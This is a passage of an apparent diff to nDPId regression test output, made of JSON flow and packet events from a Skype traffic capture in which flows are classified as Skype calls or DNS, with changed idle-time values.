+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1431970687774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687774,"pkt":"PBXCt3IO0NQSxnP1CABFAABA71RAAHIGlsMF+LrdwKgBInkiyFqd8pp25tmebbASRBBwGwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1431970687774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687774,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QypAAEAGdPrAqAEiBfi63chaeSLm2Z5tnfKad4AQECxRTAAAAQEICj4yVUQAAAAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431970687881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687881,"pkt":"PBXCt3IO0NQSxnP1CABFAABArt9AAHMGR1VH7gfLwKgBIklPyFnlnJYLkJ8qu7AS\/\/\/byQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431970687881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687881,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JOpAAEAGBFfAqAEiR+4Hy8hZSU+Qnyq75ZyWDIAQECx4gAAAAQEICj4yVa4AAAAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431970687953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970687953,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyFgS\/h6Xx3QlqKAScSDnSgAAAgQFrAQCCAq+r7gZPjJU3AEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431970688025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688025,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOK8AAEARxlrAqAEib91KDjLdAbsAGqZSfFUC4vleo7UvMvPmsU4YCKBd"} 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431970688320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688320,"pkt":"0NQSxnP1PBXCt3IOCABFAAAukPgAAEARnzfAqAEinTfrjTLdAbsAGuidfHYCyiJR+IygHiSHdyp3P0rG"} 00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431970688626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688626,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NhhAAEAGpAHAqAEiUVNNjchbROcBp2a1GMO4z4AQECwRkQAAAQEICj4yWIkAvBWs"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688781,"flow_last_seen":1431970688781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688781,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431970688781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwP5AAEAGaDbAqAEiR+4Hy8hcSU\/pBV4yAAAAALAC\/\/81QAAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688782,"flow_last_seen":1431970688782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688782,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431970688782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688782,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUvJAAEAGZSbAqAEiBfi63chdeSKNyxjDAAAAALAC\/\/80+QAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1431970688888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688888,"pkt":"PBXCt3IO0NQSxnP1CABFAABA75tAAHIGlnwF+LrdwKgBInkiyF33HT2hjcsYxLASRBBSegAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1431970688888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688888,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TDBAAEAGa\/TAqAEiBfi63chdeSKNyxjE9x09ooAQECwvYwAAAQEICj4yWYwAAAAA"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1431970688998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688998,"pkt":"PBXCt3IO0NQSxnP1CABFAABArvNAAHMGR0FH7gfLwKgBIklPyFwwtyOw6QVeM7AS\/\/93KQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1431970688998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688998,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ublAAEAGb4fAqAEiR+4Hy8hcSU\/pBV4zMLcjsYAQECwPmAAAAQEICj4yWfYAAAAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970689672,"flow_last_seen":1431970689672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970689672,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431970689672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970689672,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2ypAAEAG\/uLAqAEiUVNNjcheROdnq4JVAAAAALAC\/\/9ETAAAAgQFtAEDAwUBAQgKPjJcjQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431970689742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970689742,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CCFAAHQGnfBRU02NwKgBIkTnyF6euo9OZ6uCVqASIADwZAAAAgQFrAEDAwgEAggKALwWGz4yXI0="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431970688626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688626,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NhhAAEAGpAHAqAEiUVNNjchbROcBp2a1GMO4z4AQECwRkQAAAQEICj4yWIkAvBWs"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688781,"flow_last_seen":1431970688781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688781,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431970688781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwP5AAEAGaDbAqAEiR+4Hy8hcSU\/pBV4yAAAAALAC\/\/81QAAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688782,"flow_last_seen":1431970688782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688782,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431970688782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688782,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUvJAAEAGZSbAqAEiBfi63chdeSKNyxjDAAAAALAC\/\/80+QAAAgQFtAEDAwUBAQgKPjJZIwAAAAAEAgAA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1431970688888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688888,"pkt":"PBXCt3IO0NQSxnP1CABFAABA75tAAHIGlnwF+LrdwKgBInkiyF33HT2hjcsYxLASRBBSegAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1431970688888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688888,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TDBAAEAGa\/TAqAEiBfi63chdeSKNyxjE9x09ooAQECwvYwAAAQEICj4yWYwAAAAA"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1431970688998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688998,"pkt":"PBXCt3IO0NQSxnP1CABFAABArvNAAHMGR0FH7gfLwKgBIklPyFwwtyOw6QVeM7AS\/\/93KQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1431970688998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970688998,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ublAAEAGb4fAqAEiR+4Hy8hcSU\/pBV4zMLcjsYAQECwPmAAAAQEICj4yWfYAAAAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970689672,"flow_last_seen":1431970689672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970689672,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431970689672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970689672,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2ypAAEAG\/uLAqAEiUVNNjcheROdnq4JVAAAAALAC\/\/9ETAAAAgQFtAEDAwUBAQgKPjJcjQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431970689742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970689742,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CCFAAHQGnfBRU02NwKgBIkTnyF6euo9OZ6uCVqASIADwZAAAAgQFrAEDAwgEAggKALwWGz4yXI0="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431970690133,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970690133,"pkt":"0NQSxnP1PBXCt3IOCABFAABEeJ0AAEARfpjAqAEiwKgBAemMADUAMK9udVgBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 